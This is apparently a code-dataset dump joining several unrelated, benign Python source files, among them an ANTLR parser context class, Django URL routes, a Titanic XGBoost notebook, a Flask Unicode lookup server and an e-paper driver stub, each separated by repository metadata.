from antlr4.tree.Tree import TerminalNodeImpl, ErrorNodeImpl, TerminalNode, INVALID_INTERVAL
class ParserRuleContext(RuleContext):
def __init__(self, parent = None, invokingStateNumber = None ):
super(ParserRuleContext, self).__init__(parent, invokingStateNumber)
#* If we are debugging or building a parse tree for a visitor,
# we need to track all of the tokens and rule invocations associated
# with this rule's context. This is empty for parsing w/o tree constr.
# operation because we don't the need to track the details about
# how we parse this rule.
#/
self.children = None
self.start = None
self.stop = None
# The exception that forced this rule to return. If the rule successfully
# completed, this is {@code null}.
self.exception = None
#* COPY a ctx (I'm deliberately not using copy constructor)#/
def copyFrom(self, ctx):
# from RuleContext
self.parentCtx = ctx.parentCtx
self.invokingState = ctx.invokingState
self.children = None
self.start = ctx.start
self.stop = ctx.stop
# Double dispatch methods for listeners
def enterRule(self, listener):
pass
def exitRule(self, listener):
pass
#* Does not set parent link; other add methods do that#/
def addChild(self, child):
if self.children is None:
self.children = []
self.children.append(child)
return child
#* Used by enterOuterAlt to toss out a RuleContext previously added as
# we entered a rule. If we have # label, we will need to remove
# generic ruleContext object.
#/
def removeLastChild(self):
if self.children is not None:
del self.children[len(self.children)-1]
def addTokenNode(self, token):
node = TerminalNodeImpl(token)
self.addChild(node)
node.parentCtx = self
return node
def addErrorNode(self, badToken):
node = ErrorNodeImpl(badToken)
self.addChild(node)
node.parentCtx = self
return node
def getChild(self, i, ttype = None):
if ttype is None:
return self.children[i] if len(self.children)>i else None
else:
for child in self.getChildren():
if not isinstance(child, ttype):
continue
if i==0:
return child
i -= 1
return None
def getChildren(self, predicate = None):
if self.children is not None:
for child in self.children:
if predicate is not None and not predicate(child):
continue
yield child
def getToken(self, ttype, i):
for child in self.getChildren():
if not isinstance(child, TerminalNode):
continue
if child.symbol.type != ttype:
continue
if i==0:
return child
i -= 1
return None
def getTokens(self, ttype ):
if self.getChildren() is None:
return []
tokens = []
for child in self.getChildren():
if not isinstance(child, TerminalNode):
continue
if child.symbol.type != ttype:
continue
tokens.append(child)
return tokens
def getTypedRuleContext(self, ctxType, i):
return self.getChild(i, ctxType)
def getTypedRuleContexts(self, ctxType):
children = self.getChildren()
if children is None:
return []
contexts = []
for child in children:
if not isinstance(child, ctxType):
continue
contexts.append(child)
return contexts
def getChildCount(self):
return len(self.children) if self.children else 0
def getSourceInterval(self):
if self.start is None or self.stop is None:
return INVALID_INTERVAL
else:
return (self.start.tokenIndex, self.stop.tokenIndex)
RuleContext.EMPTY = ParserRuleContext()
class InterpreterRuleContext(ParserRuleContext):
def __init__(self, parent, invokingStateNumber, ruleIndex):
super(InterpreterRuleContext, self).__init__(parent, invokingStateNumber)
self.ruleIndex = ruleIndex
|
[
"parrt@cs.usfca.edu"
] |
parrt@cs.usfca.edu
|
2115b468d4bc223050b6dcdf147277fe1a3ae7cf
|
7252d86a55e5e388d9e7c81c3390679116a41958
|
/pages/mipagina/urls.py
|
b79f832ad575b90c9fbfbd83f5b10ee435653d0b
|
[] |
no_license
|
IvanPuentes/Proyecto_U4_Regula
|
f979f2a15fbd6dd722a707dd5bf412e5cbfaee70
|
811edd72ceea450f6392d5d228e67406bf1c0371
|
refs/heads/master
| 2023-06-04T04:42:18.334554
| 2021-06-22T00:51:43
| 2021-06-22T00:51:43
| 379,051,861
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,147
|
py
|
from django.urls import path,include
from .views import HomePageView,TecView,RegistrarView,CreateViajesView,CreateVuelosView,VueloPageView,CreateHospedajeView,HospedajePageView,UpdatePageView,UpdateVueloPageView,UpdateHospedajePageView,DescripViajesPageView,DescripVuelosPageView,DescripHospPageView,ViajeDeleteView,AboutPageView,ComentarioCreateView,SearchResultListview,VueloDeleteView,HospDeleteView,ComentarioViajeCreateView,ComentarioHospCreateView
from django.contrib.auth.views import PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, PasswordResetCompleteView
#importar las librerias y los archivos
#rutas para los templates
urlpatterns=[
path('',HomePageView.as_view(),name='home'),
path('Vuelos',VueloPageView.as_view(),name='vuelo'),
path('Hospedaje',HospedajePageView.as_view(),name='hospedaje'),
path('orders/', include('orders.urls')),
path('Acerca_de',AboutPageView.as_view(), name='About'),
path('registrar/', RegistrarView.as_view(),name='registrar'),
path('Nuevo/Viaje',CreateViajesView.as_view(),name='CreateViaje'),
path('Nuevo/Vuelo',CreateVuelosView.as_view(),name='CreateVuelo'),
path('Nuevo/Hospedaje',CreateHospedajeView.as_view(),name='CreateHospedaje'),
path('Viajes/<int:pk>/Update',UpdatePageView.as_view(),name='EditarViaje'),
path('Vuelo/<int:pk>/Update',UpdateVueloPageView.as_view(),name='EditarVuelo'),
path('Hospedaje/<int:pk>/Update',UpdateHospedajePageView.as_view(),name='EditarHospedaje'),
path('Descripcion/Viajes/<int:pk>',DescripViajesPageView.as_view(),name='DescViajes'),
path('Descripcion/Vuelos/<int:pk>',DescripVuelosPageView.as_view(),name='DescVuelos'),
path('Descripcion/Hospedaje/<int:pk>',DescripHospPageView.as_view(),name='DescHosp'),
path('Viaje/<int:pk>/delete',ViajeDeleteView.as_view(),name='deleteViaje'),
path('Vuelo/<int:pk>/delete',VueloDeleteView.as_view(),name='deleteVuelo'),
path('Hospedaje/<int:pk>/delete',HospDeleteView.as_view(),name='deleteHosp'),
path('Tec',TecView .as_view(),name='tec'),
path('Comentarios/<int:VueloComent>',ComentarioCreateView.as_view(),name='comentarioNuevo'),
path('ComentariosViaje/<int:ViajeComent>',ComentarioViajeCreateView.as_view(),name='comentarioNuevoV'),
path('ComentariosHosp/<int:HospComent>',ComentarioHospCreateView.as_view(),name='comentarioH'),
path('search', SearchResultListview.as_view(), name='search_result'),
#rutas para los cambios y reset de contraseñas
path('password_reset/', PasswordResetView.as_view(
template_name='registration/password_reset.html'
),name='password_reset'),
path('password_reset_done/', PasswordResetDoneView.as_view(
template_name='password_reset_done.html'
),name='password_reset_done'),
path('usuarios/password_reset_confirm/<u1db64>/<token>', PasswordResetConfirmView.as_view(
template_name='password_reset_confirm.html'
),name='password_reset_confirm'),
path('usuarios/password_reset_complete', PasswordResetCompleteView.as_view(
template_name='password_reset_complete.html'
),name='password_reset_complete'),
]
|
[
"ivan_andi@hotmail.com"
] |
ivan_andi@hotmail.com
|
845d79dde7ac418ae4ca8388a71edea4e4bcbc80
|
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
|
/python/zhaw_neural_style/neural_style-master/texturenet/make_image.py
|
1b842a5854b20a9d13e4427dda47c367a03a74e6
|
[] |
no_license
|
LiuFang816/SALSTM_py_data
|
6db258e51858aeff14af38898fef715b46980ac1
|
d494b3041069d377d6a7a9c296a14334f2fa5acc
|
refs/heads/master
| 2022-12-25T06:39:52.222097
| 2019-12-12T08:49:07
| 2019-12-12T08:49:07
| 227,546,525
| 10
| 7
| null | 2022-12-19T02:53:01
| 2019-12-12T07:29:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,007
|
py
|
import os
import time
import mxnet as mx
import numpy as np
import symbol
import cPickle as pickle
from skimage import io, transform
def crop_img(im, size):
im = io.imread(im)
if im.shape[0]*size[1] > im.shape[1]*size[0]:
c = (im.shape[0]-1.*im.shape[1]/size[1]*size[0]) / 2
c = int(c)
im = im[c:-(1+c),:,:]
else:
c = (im.shape[1]-1.*im.shape[0]/size[0]*size[1]) / 2
c = int(c)
im = im[:,c:-(1+c),:]
im = transform.resize(im, size)
im *= 255
return im
def preprocess_img(im, size):
if type(size) == int:
size = (size, size)
im = crop_img(im, size)
im = im.astype(np.float32)
im = np.swapaxes(im, 0, 2)
im = np.swapaxes(im, 1, 2)
im[0,:] -= 123.68
im[1,:] -= 116.779
im[2,:] -= 103.939
im = np.expand_dims(im, 0)
return im
def postprocess_img(im):
im = im[0]
im[0,:] += 123.68
im[1,:] += 116.779
im[2,:] += 103.939
im = np.swapaxes(im, 0, 2)
im = np.swapaxes(im, 0, 1)
im[im<0] = 0
im[im>255] = 255
return im.astype(np.uint8)
class Maker():
def __init__(self, model_prefix, output_shape, task):
self.task = task
s1, s0 = output_shape
s0 = s0//32*32
s1 = s1//32*32
self.s0 = s0
self.s1 = s1
if task == 'texture':
self.m = 5
generator = symbol.generator_symbol(self.m, task)
args = mx.nd.load('%s_args.nd'%model_prefix)
for i in range(self.m):
args['z_%d'%i] = mx.nd.zeros([1,3,s0/16*2**i,s1/16*2**i], mx.gpu())
else:
self.m = 5
generator = symbol.generator_symbol(self.m, task)
args = mx.nd.load('%s_args.nd'%model_prefix)
for i in range(self.m):
args['znoise_%d'%i] = mx.nd.zeros([1,3,s0/16*2**i,s1/16*2**i], mx.gpu())
args['zim_%d'%i] = mx.nd.zeros([1,3,s0/16*2**i,s1/16*2**i], mx.gpu())
self.gene_executor = generator.bind(ctx=mx.gpu(), args=args, aux_states=mx.nd.load('%s_auxs.nd'%model_prefix))
def generate(self, save_path, content_path=''):
if self.task == 'texture':
for i in range(self.m):
self.gene_executor.arg_dict['z_%d'%i][:] = mx.random.uniform(-128,128,[1,3,self.s0/16*2**i,self.s1/16*2**i])
self.gene_executor.forward(is_train=True)
out = self.gene_executor.outputs[0].asnumpy()
im = postprocess_img(out)
io.imsave(save_path, im)
else:
for i in range(self.m):
self.gene_executor.arg_dict['znoise_%d'%i][:] = mx.random.uniform(-10,10,[1,3,self.s0/16*2**i,self.s1/16*2**i])
self.gene_executor.arg_dict['zim_%d'%i][:] = preprocess_img(content_path, (self.s0/16*2**i,self.s1/16*2**i))
self.gene_executor.forward(is_train=True)
out = self.gene_executor.outputs[0].asnumpy()
im = postprocess_img(out)
io.imsave(save_path, im)
|
[
"659338505@qq.com"
] |
659338505@qq.com
|
ce4f7f8a6237434ae7a29315408556d8fbc515a1
|
4db61d3e2b36d11aff43be060f8bab6fef3a6c63
|
/flask/index.py
|
2b6e8fb05982a31b2f54f967d6233860b58f71f7
|
[] |
no_license
|
ramalho/microfinder
|
1d59daa3cbb741d80f759ab3a4dd8c189aeed80b
|
0be75d9ff0003e570668db5bcd51e6e5e72821c4
|
refs/heads/master
| 2020-03-24T18:17:37.355736
| 2018-10-10T15:02:22
| 2018-10-10T15:02:22
| 142,888,420
| 0
| 0
| null | 2018-07-30T14:39:53
| 2018-07-30T14:39:52
| null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
import sys, unicodedata
import flask
def add_entry(index, char, name):
for word in name.split():
index.setdefault(word, []).append(char)
def index():
entries = {}
for code in range(sys.maxunicode):
char = chr(code)
try:
name = unicodedata.name(char)
except ValueError:
continue
add_entry(entries, char, name)
return entries
word_index = index()
app = flask.Flask(__name__)
@app.route("/")
def root():
return "This is the microfinder index API server"
@app.route("/<query_str>")
def query(query_str):
try:
res = word_index[query_str.upper()]
except KeyError:
flask.abort(404)
else:
return flask.jsonify(res)
if __name__ == "__main__":
app.run()
|
[
"luciano@ramalho.org"
] |
luciano@ramalho.org
|
b118cd2999cf826b059834c59cf36cb1395e6d13
|
a560269290749e10466b1a29584f06a2b8385a47
|
/Notebooks/py/element/titanic-simple-xgboost-model/titanic-simple-xgboost-model.py
|
c62cce354181f28a6563da15d0f966cfde7f6e46
|
[] |
no_license
|
nischalshrestha/automatic_wat_discovery
|
c71befad1aa358ae876d5494a67b0f4aa1266f23
|
982e700d8e4698a501afffd6c3a2f35346c34f95
|
refs/heads/master
| 2022-04-07T12:40:24.376871
| 2020-03-15T22:27:39
| 2020-03-15T22:27:39
| 208,379,586
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,757
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Basic modeling
# This notebook presents simple and quick way to implement a XGBoost classifier on the Titanic dataset. It doesn't come to data visualization and feature engineering. This is kind of a first approach.
# In[ ]:
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.metrics import accuracy_score
from sklearn import model_selection
from sklearn import preprocessing
from xgboost import XGBClassifier
import matplotlib.pylab as pylab
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.ensemble import BaggingClassifier
def extractDeck(x):
if str(x) != "nan":
return str(x)[0]
else :
return
#Import data
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
combine = train.drop(["Survived"], axis=1).append(test).drop(["PassengerId", "Ticket"], axis=1)
target = train['Survived']
#Feature preprocessing
combine["hasParents"] = combine["Parch"].apply(lambda x : (x>0)*1)
combine["hasSibs"] = combine["SibSp"].apply(lambda x : (x>0)*1)
combine["title"] = combine['Name'].str.extract(' ([A-Za-z]+)\.', expand=False)
combine["Deck"] = combine['Cabin'].apply(extractDeck)
combine.drop(["Parch", "SibSp", "Cabin", "Name"], axis=1)
#Turning categorical to integer
combine['Sex'] = combine['Sex'].map( {'female': 1, 'male': 0} ).astype(int)
#One hot encoding on Embarked
combine['Embarked'].fillna('S', inplace = True)
#combine = pd.get_dummies(combine)#, columns = ['Embarked'])
#Fill the blank
combine['Age'].fillna(combine['Age'].dropna().median(), inplace = True)
#Turning age to ranges
combine.loc[(combine['Age'] <= 16), 'Age'] = 0
combine.loc[(combine['Age'] > 16) & (combine['Age'] <= 32), 'Age'] = 1
combine.loc[(combine['Age'] > 32) & (combine['Age'] <= 48), 'Age'] = 2
combine.loc[(combine['Age'] > 48) & (combine['Age'] <= 64), 'Age'] = 3
combine.loc[(combine['Age'] > 64), 'Age']
#Filling the blank
combine['Fare'].fillna(combine['Fare'].dropna().median(), inplace=True)
#Turning fare to ranges
combine.loc[ combine['Fare'] <= 7.91, 'Fare'] = 0
combine.loc[(combine['Fare'] > 7.91) & (combine['Fare'] <= 14.454), 'Fare'] = 1
combine.loc[(combine['Fare'] > 14.454) & (combine['Fare'] <= 31), 'Fare'] = 2
combine.loc[ combine['Fare'] > 31, 'Fare'] = 3
combine['Fare'] = combine['Fare'].astype(int)
combine["Pclass"]=combine["Pclass"].astype("str")
combine = pd.get_dummies(combine)
#Defining learning vectors
nb = train.shape[0]
X = combine[:nb]
y = target
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.1, train_size=0.9)
#XGBoost model tuning
model = XGBClassifier(booster='gbtree', silent=1, seed=0, base_score=0.5, subsample=0.75)
parameters = {'n_estimators':[75], #50,100
'max_depth':[4],#1,10
'gamma':[4],#0,6
'max_delta_step':[1],#0,2
'min_child_weight':[1], #3,5
'colsample_bytree':[0.55,0.6,0.65], #0.5,
'learning_rate': [0.001,0.01,0.1]
}
tune_model = GridSearchCV(model, parameters, cv=3, scoring='accuracy')
tune_model.fit(X_train,y_train)
print('Best parameters :', tune_model.best_params_)
print('Results :', format(tune_model.cv_results_['mean_test_score'][tune_model.best_index_]*100))
#Learn on the whole data
tune_model.fit(X, y)
Y_pred = tune_model.predict(combine[nb:])
#Submit the prediction
submission = pd.DataFrame({
"PassengerId": test["PassengerId"],
"Survived": Y_pred
})
submission.to_csv('submission.csv', index=False)
# In[ ]:
|
[
"bitsorific@gmail.com"
] |
bitsorific@gmail.com
|
901f1bc9d292c42147ff6373749f92023a60771d
|
f77028577e88d228e9ce8252cc8e294505f7a61b
|
/web_backend/nvlserver/module/user/specification/create_user_specification.py
|
01c30c0f0202bb9a1c221340e3632c081cd325eb
|
[] |
no_license
|
Sud-26/Arkally
|
e82cebb7f907a3869443b714de43a1948d42519e
|
edf519067d0ac4c204c12450b6f19a446afc327e
|
refs/heads/master
| 2023-07-07T02:14:28.012545
| 2021-08-06T10:29:42
| 2021-08-06T10:29:42
| 392,945,826
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 691
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
create_user_element_query = """
INSERT INTO public."user" AS usr
(email, password, fullname, locked, language_id, meta_information,
account_type_id, active, deleted)
VALUES
($1, $2, $3, $4, $5, $6, $7, $8, FALSE) RETURNING *;
"""
create_user_element_query_front = """
INSERT INTO public."user" AS usr
(email, password, fullname, locked, language_id, meta_information,
account_type_id, active, gendar, companyName, address, city, postalcode, country, mobilenumber, webpage, updatebymails, vatid, deleted)
VALUES
($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15, $16, $17, $18, FALSE) RETURNING *;
"""
|
[
"sudhakar@satmatgroup.com"
] |
sudhakar@satmatgroup.com
|
9da0eadc5fc439cbbbfa4f8b4d71be538501e928
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03423/s386141222.py
|
32ef67cadf9e12133fae837a4a87668df41844e1
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
def main():
import sys
input = sys.stdin.readline
N = int(input())
print(N//3)
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
6a02c8fb4d49934aaaa161755b66b6468067b274
|
ed0dd577f03a804cdc274f6c7558fafaac574dff
|
/python/pyre/services/__init__.py
|
163504bbf5b01997c49c4e80a164a9d41b3fcac5
|
[
"Apache-2.0"
] |
permissive
|
leandromoreira/vmaf
|
fd26e2859136126ecc8e9feeebe38a51d14db3de
|
a4cf599444701ea168f966162194f608b4e68697
|
refs/heads/master
| 2021-01-19T03:43:15.677322
| 2016-10-08T18:02:22
| 2016-10-08T18:02:22
| 70,248,500
| 3
| 0
| null | 2016-10-07T13:21:28
| 2016-10-07T13:21:27
| null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def evaluator(name=None):
from Evaluator import Evaluator
return Evaluator(name)
def pickler(name=None):
from Pickler import Pickler
return Pickler(name)
def request(command, args=None):
from ServiceRequest import ServiceRequest
return ServiceRequest(command, args)
# version
__id__ = "$Id: __init__.py,v 1.1.1.1 2006-11-27 00:10:06 aivazis Exp $"
# End of file
|
[
"zli@netflix.com"
] |
zli@netflix.com
|
39a8dc422113338f86c9a52b0309b38e0cc34c95
|
3b88c7805cf6b8fb9a1e00470c7c6faebd7efa80
|
/src/outpost/django/geo/migrations/0022_auto_20221219_1728.py
|
92841f8165ec5c82eb8781f15ea220c83c9d0db0
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
medunigraz/outpost.django.geo
|
e84abc7a550b2d0e82f6bb58611039762543be67
|
04424d97c992b3d6f3ca16e9109df9c530a4ba2a
|
refs/heads/master
| 2023-07-24T03:37:50.531723
| 2022-12-19T19:29:14
| 2022-12-19T19:29:14
| 183,224,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,373
|
py
|
# Generated by Django 2.2.28 on 2022-12-19 16:28
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('geo', '0021_auto_20200805_1403'),
]
operations = [
migrations.AlterModelOptions(
name='node',
options={'get_latest_by': 'modified'},
),
migrations.AlterModelOptions(
name='pointofinterestinstance',
options={'get_latest_by': 'modified'},
),
migrations.AlterField(
model_name='level',
name='order',
field=models.PositiveIntegerField(db_index=True, editable=False, verbose_name='order'),
),
migrations.AlterField(
model_name='pointofinterest',
name='order',
field=models.PositiveIntegerField(db_index=True, editable=False, verbose_name='order'),
),
migrations.RunSQL(
"ALTER TABLE geo_room ALTER COLUMN layout type geometry(MultiPolygon, 3857) using ST_Multi(layout);",
state_operations=[
migrations.AlterField(
model_name='room',
name='layout',
field=django.contrib.gis.db.models.fields.MultiPolygonField(srid=3857),
),
],
)
]
|
[
"michael@fladi.at"
] |
michael@fladi.at
|
6ff07d0ed47b6d34994d78317a0abf2e183bcc46
|
99fca8eaa3fb5e93ed4ed857b439293bc0952c79
|
/Data Visualization Pandas/plot_1.py
|
e37cba6e99ff3c2c68fea4f574dddd99d7c01ca1
|
[] |
no_license
|
Ebyy/python_projects
|
7adb377f4e8eec94613e4e348f02c2ded306efac
|
0cacfab443d3eeeb274836b7be4b7205585f7758
|
refs/heads/master
| 2020-05-19T22:28:17.672051
| 2019-05-19T19:32:19
| 2019-05-19T19:32:19
| 185,240,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
import numpy as np
style.use('ggplot')
web_stats = {'Day': [1,2,3,4,5,6],
'Visitors': [43,53,34,45,64,34],
'Bounce_Rate': [65,72,62,64,54,66]}
df = pd.DataFrame(web_stats)
#print(df)
#print(df.head())
#print(df.tail())
print(df.tail(2)) # prints 2 rolls from the bottom
print(df.set_index('Day'))
#df.set_index('Day', inplace=True) or equate the function to
# a variable(df2) then print to set the index permanently
print(df.head())
# t reference a specific column
print(df['Bounce_Rate'])
#or
print(df.Visitors)
print(df[['Bounce_Rate', 'Visitors']]) # to refernce two columns
print(df.Visitors.tolist())
print(np.array(df[['Bounce_Rate', 'Visitors']]))
df2 = pd.DataFrame(np.array(df[['Bounce_Rate', 'Visitors']]))
print(df2)
|
[
"eberechi_oo@yahoo.com"
] |
eberechi_oo@yahoo.com
|
d6f6f38657b6972b2a4266a44848d7eeb98c00b3
|
ba977400c6f7e23dd2934476d70db38f8d83c2e5
|
/visualization/92_plot_training.py
|
e155069e7bd9d7bd6c01606041bffd35fa3e54a9
|
[] |
no_license
|
jasonwei20/adaptable-image-classification
|
9b53396e7db84e4e025f7686bc6936b7b64fa5e1
|
4762d1a8a6a8151bfec0306d07525dc43048aba6
|
refs/heads/master
| 2021-02-11T08:36:21.327647
| 2020-04-05T16:53:20
| 2020-04-05T16:53:20
| 244,473,217
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import numpy as np
from pathlib import Path
from typing import (Dict, List)
checkpoint_folder_dict = { Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92a"): "Random (Baseline)",
Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92b"): "Highest 20 Percent by Gradient",
Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92c"): "Highest 10 Percent + Random Sample 10 Percent",
Path("/home/brenta/scratch/jason/checkpoints/voc/vanilla/exp_92d"): "Lowest 20 Percent by Graident", }
def get_image_names(folder: Path) -> List[Path]:
"""
Find the names and paths of all of the images in a folder.
Args:
folder: Folder containing images (assume folder only contains images).
Returns:
A list of the names with paths of the images in a folder.
"""
return sorted([
Path(f.name) for f in folder.iterdir() if ((
folder.joinpath(f.name).is_file()) and (".DS_Store" not in f.name))
],
key=str)
def checkpoint_folder_to_val_accs(checkpoint_folder):
tup_list = []
checkpoint_names = get_image_names(checkpoint_folder)
for checkpoint_name in checkpoint_names:
checkpoint_str = str(checkpoint_name)[:-3]
parts = checkpoint_str.split('_')
epoch_num = int(parts[1][1:])
mb_num = int(parts[2][2:])
val_acc = float(parts[3][2:])
tup = (mb_num, val_acc)
tup_list.append(tup)
tup_list = sorted(tup_list, key=lambda x:x[0])
mb_num_list = [x[0] for x in tup_list]
val_acc_list = [x[1] for x in tup_list]
return mb_num_list, val_acc_list
def plot_val_accs(output_path, checkpoint_folder_dict):
fig, ax = plt.subplots()
plt.ylim([-0.02, 1.02])
for checkpoint_folder in checkpoint_folder_dict:
mb_num_list, val_acc_list = checkpoint_folder_to_val_accs(checkpoint_folder)
plt.plot( mb_num_list, val_acc_list, label=checkpoint_folder_dict[checkpoint_folder] )
print(mb_num_list)
print(val_acc_list)
plt.legend(loc="lower right")
plt.title("CL performance on predicting image rotations (ResNet18, VOC RotNet)")
plt.xlabel("Minibatch Updates")
plt.ylabel("Validation Accuracy")
plt.savefig(output_path, dpi=400)
if __name__ == "__main__":
plot_val_accs("outputs/test_voc.png", checkpoint_folder_dict)
|
[
"jason.weng.wei@gmail.com"
] |
jason.weng.wei@gmail.com
|
7fd36cfa7f03dce19df244b78377d20894673f87
|
523f8f5febbbfeb6d42183f2bbeebc36f98eadb5
|
/41_2.py
|
f343d466c7476a09c8c0fa86b2be1400e2016843
|
[] |
no_license
|
saleed/LeetCode
|
655f82fdfcc3000400f49388e97fc0560f356af0
|
48b43999fb7e2ed82d922e1f64ac76f8fabe4baa
|
refs/heads/master
| 2022-06-15T21:54:56.223204
| 2022-05-09T14:05:50
| 2022-05-09T14:05:50
| 209,430,056
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 954
|
py
|
class Solution(object):
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
#哈希表的思路,但是哈希表又不能新开辟内存,所以直接使用nums的内存,
for i in range(len(nums)):
j=i
# print(j)
# while nums[j]>0 and nums[j]<=len(nums) and nums[j]!= j+1:
while nums[j] > 0 and nums[j] <= len(nums) and nums[nums[j]-1] != nums[j]:
# print(j,nums[j])
# nums[j],nums[nums[j]-1]=nums[nums[j]-1],nums[j]
tmp=nums[nums[j]-1]
nums[nums[j]-1]=nums[j]
nums[j]=tmp
print(nums)
for i in range(len(nums)):
if nums[i]!=i+1:
return i+1
return len(nums)+1
a=Solution()
# test1=[1,2,0]
# print(a.firstMissingPositive(test1))
test2=[-1,4,2,1,9,10]
print(a.firstMissingPositive(test2))
|
[
"1533441387@qq.com"
] |
1533441387@qq.com
|
8fd706f7e60376636515b21a0251659fca0ba11a
|
f16c091a4a5eacbf4baa4d9a5bd747de7e43c9fd
|
/webfeet.py
|
a1584157608c132d8d3b6f92699212dffebab86d
|
[
"BSD-3-Clause"
] |
permissive
|
tdsmithCapU/pymarc-ebooks-scripts
|
28c2e2040510cce2b28a12f098bf702f3b3fcc15
|
61cba8e4d83ea6621d2a004294c9cf29d6cdfff8
|
refs/heads/master
| 2021-05-28T16:53:23.540185
| 2014-11-07T20:25:09
| 2014-11-07T20:25:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
#!/usr/bin/env python
"""
outputs number of these terrible "Web Feet" records we had in our catalog
because we wanted to delete them all
"""
from pymarc import MARCReader
reader = MARCReader(open('ebooks.MRC'))
numWF = 0
op = ''
for record in reader:
op = ''
if record['245'] is not None:
if record['245']['c'] is not None:
if record['245']['c'] == '[selected by Web Feet].':
numWF += 1
print record.title()
print "Web Feet records: ", numWF
|
[
"phette23@gmail.com"
] |
phette23@gmail.com
|
1efba9bbb51a11c2017e78de5abfebea16dc6fd2
|
0afdfbe3f5b16ef9662d69968a3675a0b51766a7
|
/bin/svn-release
|
537c25a62d21dd59bb75a98bb9517ac4fd36cc7a
|
[] |
no_license
|
tumb1er/bamboo-build-tools
|
3fd5b54f28d037ef67d86e2d8c5f74b2400a28a6
|
c10f31850bfcd8fd3e5ba075740c4138482e541c
|
refs/heads/master
| 2021-01-02T08:39:32.697471
| 2019-01-22T06:35:32
| 2019-01-22T06:35:32
| 10,936,292
| 14
| 13
| null | 2015-12-24T15:47:00
| 2013-06-25T11:18:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,200
|
#!/usr/bin/env python
from optparse import OptionParser
import re
import sys
from bamboo.helpers import cerr
from bamboo.svn import SVNHelper
parser = OptionParser(
usage='%prog [options] <integration-task-key> <stable>',
epilog='if not task_key supplied, will take them from STDIN')
parser.add_option("-c", "--config-file", dest="configfile",
default='bamboo.cfg', help="read config from FILE",
metavar="FILE")
parser.add_option("-t", "--root", dest="root", default="^",
help="project root location")
parser.add_option("-i", "--interactive", dest="interactive", default=False,
action="store_true", help="confirm actions")
options, args = parser.parse_args()
if len(args) < 2:
parser.print_usage()
sys.exit(-1)
m = re.match(r'([A-Z]+)-[\d]+', args[0])
if not m:
cerr('invalid JIRA task key: ' + args[0])
sys.exit(-2)
if not re.match(r'^[\d]+\.(x|[\d]+\.(x|[\d]+))$', args[1]):
cerr('invalid stable: ' + args[1])
sys.exit(-2)
project_key = m.group(1)
svn = SVNHelper(project_key, root=options.root, configfile=options.configfile)
svn.release(args[0], args[1], interactive=options.interactive)
|
[
"zimbler@gmail.com"
] |
zimbler@gmail.com
|
|
4da67f7240f871ec3438e461842e4d016a41d031
|
9da6036e7448a30d1b30fa054f0c8019215343f7
|
/epaper7in5b.py
|
60eec18a29920c0228b2d6d5ea7e89fa4cd224a6
|
[
"MIT"
] |
permissive
|
Markus-Be/micropython-waveshare-epaper
|
4e24a3535bade98d030b4259a089d9521b83f372
|
54e44f5eb1f58185f6ee4c3bf698a5b270584c8a
|
refs/heads/master
| 2020-03-17T23:25:02.684134
| 2018-02-25T22:02:23
| 2018-02-25T22:02:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,906
|
py
|
# MicroPython library for Waveshare 7.5" B/W/R e-paper display GDEW075Z09
from micropython import const
from time import sleep_ms
import ustruct
# Display resolution
EPD_WIDTH = const(640)
EPD_HEIGHT = const(384)
# Display commands
PANEL_SETTING = const(0x00)
POWER_SETTING = const(0x01)
POWER_OFF = const(0x02)
#POWER_OFF_SEQUENCE_SETTING = const(0x03)
POWER_ON = const(0x04)
